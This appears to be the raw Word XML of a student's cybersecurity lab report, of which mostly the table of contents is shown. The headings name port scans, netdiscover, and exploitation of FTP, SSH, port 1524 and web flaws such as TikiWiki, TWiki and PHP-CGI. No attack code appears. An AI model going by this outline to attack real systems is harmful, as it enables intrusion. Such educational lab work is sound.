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0BE43" w14:textId="53C87CD0" w:rsidR="007B327D" w:rsidRDefault="00460C48" w:rsidP="003A3D15">
      <w:r>
        <w:t>Cybersecurity Degree Module 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B407A" w14:textId="77777777" w:rsidR="000212CA" w:rsidRDefault="000212CA" w:rsidP="000212CA"/>
    <w:p w14:paraId="0027F00E" w14:textId="3CAA8C69" w:rsidR="000212CA" w:rsidRPr="000212CA" w:rsidRDefault="000212CA" w:rsidP="000212CA">
      <w:r>
        <w:t>Richard Wadsworth rcwadsworth21@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A1D44" w14:textId="77777777" w:rsidR="00012388" w:rsidRPr="00012388" w:rsidRDefault="00012388" w:rsidP="00012388"/>
    <w:p w14:paraId="3D8B1B38" w14:textId="31335CF1" w:rsidR="000212CA" w:rsidRDefault="00012388">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55092352" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Resources</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092352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1CA0004C" w14:textId="68F4B28B" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092353" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web references</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092353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41382BFE" w14:textId="0D32E408" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092354" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Reports must-read.</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092354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22FC7496" w14:textId="19A6CCFB" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092355" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>GVM Summary of issues</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092355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4A1152A4" w14:textId="1EA600C0" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092356" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Ports</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092356 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="159C479B" w14:textId="0952B73D" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092357" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Applications</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092357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2773B99C" w14:textId="03A9E9E2" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092358" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Operating sytem</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092358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1DA46745" w14:textId="77C8B219" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092359" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>CVE’s detected.</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092359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471A947D" w14:textId="0165720C" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092360" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Running netdiscover</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092360 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61BF51C1" w14:textId="239654B4" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092361" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1524</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092361 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03B04ADC" w14:textId="01D9A45D" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092362" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploitng Port 21 FTP</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092362 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D34830F" w14:textId="43881CC9" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092363" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 2121 NVT: FTP Brute Force Logins Reporting</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092363 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0294A594" w14:textId="79FC2F5D" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092364" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 22 Exploiting Open SSH</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092364 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BA0CB0D" w14:textId="2F575E39" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092365" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 80  Web</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092365 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="029A729E" w14:textId="2040D60C" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092366" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>tikiwiki_graph_formula_exec</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092366 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A2BC70D" w14:textId="562AE6FF" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092367" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>TWiki is prone to Cross-Site Scripting (XSS) and Command Execution Vulnerabilities.</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092367 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C802BA4" w14:textId="18BB9CFA" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092368" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Misconfigured web servers allows remote clients to perform dangerous HTTP methods such as PUT and DELETE.</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092368 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C173554" w14:textId="6BA2D0F3" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092369" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>PHP-CGI-based setups vulnerability when parsing query string parameters from php filles.</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092369 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
